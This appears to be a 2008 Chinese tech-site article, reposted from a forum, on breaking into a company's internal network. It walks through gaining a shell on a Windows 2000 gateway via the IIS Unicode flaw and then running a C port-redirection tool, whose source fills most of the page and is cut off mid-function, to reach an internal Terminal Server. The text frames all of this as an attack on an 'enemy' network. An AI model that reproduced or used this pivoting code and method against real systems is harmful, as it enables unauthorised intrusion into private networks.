科技行者

行者学院 转型私董会 科技行者专题报道 网红大战科技行者

知识库

知识库 安全导航

至顶网网络频道编程突破TCP/IP过滤防火墙进入内网

编程突破TCP/IP过滤防火墙进入内网

  • 扫一扫
    分享文章到微信

  • 扫一扫
    关注官方公众号
    至顶头条

现在很多企业或者公司基本上网方式基本上都是申请一条连接到Internet的线路,宽带、DDN、ADSL、ISDN等等,然后用一台服务器做网关,服务器两块网卡。

作者:zdnet安全频道 来源:论坛整理 2008年10月22日

关键字: 防火墙 TCP/IP

  • 评论
  • 分享微博
  • 分享邮件
  现在很多企业或者公司基本上网方式基本上都是申请一条连接到Internet的线路,宽带、DDN、ADSL、ISDN等等,然后用一台服务器做网关,服务器两块网卡,一块是连接到Internet,另一块是连接到内网的HUB或者交换机,然后内网的其他机器就可以通过网关连接到Internet。
  
  也许有些人会这样想,我在内网之中,我们之间没有直接的连接,你没有办法攻击我。事实并非如此,在内网的机器同样可能遭受到来自Internet的攻击,当然前提是攻击者已经取得网关服务器的某些权限,呵呵,这是不是废话?其实,Internet上很多做网关的服务器并未经过严格的安全配置,要获取权限也不是想象中的那么难。
  
  Ok!废话就不说了,切入正题。我们的目标是用我们的TermClient[M$终端服务客户端]连接到敌人内网的TermServer机器。M$的终端服务是一个很好的远程管理工具,不是吗?呵呵。没有做特别说明的话,文中提到的服务器OS都为windows 2000。服务器为Linux或其他的话,原理也差不多,把程序稍微修改就行了。
  
  假设敌人网络拓扑如下图所示,没有安装防火墙或在网关服务器上做TCP/IP限制。
  
  我们的目标是连接上敌人内网的Terminal Server[192.168.1.3],因为没有办法直接和他建立连接,那么只有先从它的网关服务器上下手了。假如敌人网关服务器是M$的windows 2k,IIS有Unicode漏洞[现在要找些有漏洞的机器太容易了,但我只是scripts kid,只会利用现成的漏洞做些简单的攻击:(555),那么我们就得到一个网关的shell了,我们可以在那上面运行我们的程序,虽然权限很低,但也可以做很多事情了。Ok!让我们来写一个做TCP socket数据转发的小程序,让敌人的网关服务器忠实的为我[202.1.1.1]和敌人内网的TermServer[192.168.1.3]之间转发数据。题外话:实际入侵过程是先取得网关服务器的权限,然后用他做跳板,进一步摸清它的内部网络拓扑结构,再做进一步的入侵,现在敌人的网络拓扑是我们给他设计的。
  
  攻击流程如下:
  
  <1>在网关服务器202.2.2.2运行我们的程序AgentGateWay,他监听TCP 3389端口[改成别的,那我们就要相应的修改TermClient了]等待我们去连接。
  
  <2>我们202.1.1.1用TermClient连接到202.2.2.2:3389。
  
  <3>202.2.2.2.接受202.1.1.1的连接,然后再建立一个TCP socket连接到自己内网的TermServer[192.168.1.3]
  
  <4>这样我们和敌人内网的TermServer之间的数据通道就建好了,接下来网关就忠实的为我们转发数据啦。当我们连接到202.2.2.2:3389的时候,其实出来的界面是敌人内网的192.168.1.3,感觉怎么样?
  
  程序代码如下:
  
  /**********************************************************************
  
  Module Name:AgentGateWay.c
  
  Date:2001/4/15
  
  CopyRight(c) eyas
  
  说明:端口重定向工具,在网关上运行,把端口重定向到内网的IP、PORT,
  
  就可以进入内网了
  
  sock[0]==>sClient sock[1]==>sTarget
  
  **********************************************************************/
  
  #include
  
  #include
  
  #include "TCPDataRedird.c"
  
  #define TargetIP TEXT("192.168.1.3")
  
  #define TargetPort (int)3389
  
  #define ListenPort (int)3389//监听端口
  
  #pragma comment(lib,"ws2_32.lib")
  
  int main()
  
  {
  
  WSADATA wsd;
  
  SOCKET sListen=INVALID_SOCKET,//本机监听的socket
  
  sock[2];
  
  struct sockaddr_in Local,Client,Target;
  
  int iAddrSize;
  
  HANDLE hThreadC2T=NULL,//C2T=ClientToTarget
  
  hThreadT2C=NULL;//T2C=TargetToClient
  
  DWORD dwThreadID;
  
  __try
  
  {
  
  if(WSAStartup(MAKEWORD(2,2),&wsd)!=0)
  
  {
  
  printf("\nWSAStartup() failed:%d",GetLastError());
  
  __leave;
  
  }
  
  sListen=socket(AF_INET,SOCK_STREAM,IPPROTO_IP);
  
  if(sListen==INVALID_SOCKET)
  
  {
  
  printf("\nsocket() failed:%d",GetLastError());
  
  __leave;
  
  }
  
  Local.sin_addr.s_addr=htonl(INADDR_ANY);
  
  Local.sin_family=AF_INET;
  
  Local.sin_port=htons(ListenPort);
  
  Target.sin_family=AF_INET;
  
  Target.sin_addr.s_addr=inet_addr(TargetIP);
  
  Target.sin_port=htons(TargetPort);
  
  if(bind(sListen,(struct sockaddr *)&Local,sizeof(Local))==SOCKET_ERROR)
  
  {
  
  printf("\nbind() failed:%d",GetLastError());
  
  __leave;
  
  }
  
  if(listen(sListen,1)==SOCKET_ERROR)
  
  {
  
  printf("\nlisten() failed:%d",GetLastError());
  
  __leave;
  
  }
  
  //scoket循环
  
  while(1)
  
  {
  
  printf("\n\n*************Waiting Client Connect to**************\n\n");
  
  iAddrSize=sizeof(Client);
  
  //get socket sClient
  
  sock[0]=accept(sListen,(struct sockaddr *)&Client,&iAddrSize);
  
  if(sock[0]==INVALID_SOCKET)
  
  {
  
  printf("\naccept() failed:%d",GetLastError());
  
  break;
  
  }
  
  printf("\nAccept client==>%s:%d",inet_ntoa(Client.sin_addr), ntohs(Client.sin_port));
  
  //create socket sTarget
  
  sock[1]=socket(AF_INET,SOCK_STREAM,IPPROTO_IP);
  
  if(sock[1]==INVALID_SOCKET)
  
  {
  
  printf("\nsocket() failed:%d",GetLastError());
  
  __leave;
  
  }
  
  //connect to target port
  
  if(connect(sock[1],(struct sockaddr *)&Target,sizeof(Target))==SOCKET_ERROR)
  
  {
  
  printf("\nconnect() failed:%d",GetLastError());
  
  __leave;
  
  }
  
  printf("\nconnect to target 3389 success!");
  
  //创建两个线程进行数据转发
  
  hThreadC2T=CreateThread(NULL,0,TCPDataC2T,(LPVOID)sock,0,&dwThreadID);
  
  hThreadT2C=CreateThread(NULL,0,TCPDataT2C,(LPVOID)sock,0,&dwThreadID);
  
  //等待两个线程结束
  
  WaitForSingleObject(hThreadC2T,INFINITE);
  
  WaitForSingleObject(hThreadT2C,INFINITE);
  
  CloseHandle(hThreadC2T);
  
  CloseHandle(hThreadT2C);
  
  closesocket(sock[1]);
  
  closesocket(sock[0]);
  
  printf("\n\n*****************Connection Close*******************\n\n");
  
  }//end of sock外循环
  
  }//end of try
  
  __finally
  
  {
  
  if(sListen!=INVALID_SOCKET) closesocket(sListen);
  
  if(sock[0]!=INVALID_SOCKET) closesocket(sock[0]);
  
  if(sock[1]!=INVALID_SOCKET) closesocket(sock[1]);
  
  if(hThreadC2T!=NULL) CloseHandle(hThreadC2T);
  
  if(hThreadT2C!=NULL) CloseHandle(hThreadT2C);
  
  WSACleanup();
  
  }
  
  return 0;
  
  }
  
  /*************************************************************************
  
  Module:TCPDataRedird.c
  
  Date:2001/4/16
  
  CopyRight(c) eyas
  
  HomePage:www.patching.net
  
  Thanks to shotgun
  
  说明:TCP socket数据转发,sock[0]==>sClient sock[1]==>sTarget
  
  *************************************************************************/
  
  #define BuffSize 20*1024 //缓冲区大小20k
  
  //此函数负责从Client读取数据,然后转发给Target
  
  DWORD WINAPI TCPDataC2T(SOCKET* sock)
  
  {
  
  int iRet,
  
  ret=-1,//select 返回值
  
  iLeft,
  
  idx,
  
  iSTTBCS=0;//STTBCS=SendToTargetBuffCurrentSize
  
  char szSendToTargetBuff[BuffSize]=,
  
  szRecvFromClientBuff[BuffSize]=;
  
  fd_set fdread,fdwrite;
  
  printf("\n\n*****************Connection Active*******************\n\n");
  
  while(1)
  
  {
  
  FD_ZERO(&fdread);
  
  FD_ZERO(&fdwrite);
  
  FD_SET(sock[0],&fdread);
  
  FD_SET(sock[1],&fdwrite);
  
  if((ret=select(0,&fdread,&fdwrite,NULL,NULL))==SOCKET_ERROR)
  
  {
    • 评论
    • 分享微博
    • 分享邮件
    邮件订阅

    如果您非常迫切的想了解IT领域最新产品与技术信息,那么订阅至顶网技术邮件将是您的最佳途径之一。

    重磅专题
    往期文章
    最新文章